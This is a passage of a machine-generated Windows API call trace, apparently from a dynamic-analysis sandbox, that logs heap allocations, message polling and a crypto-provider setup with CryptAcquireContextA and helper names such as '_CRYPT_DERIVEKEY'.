CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0266.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0266.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.215] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0266.228] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0266.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.229] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0266.229] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0266.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.230] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.230] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.230] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.230] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.230] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0266.230] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.231] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.231] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.231] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.231] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.231] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0266.232] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0266.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.234] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.234] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.234] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.234] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.235] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.235] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.235] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.235] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 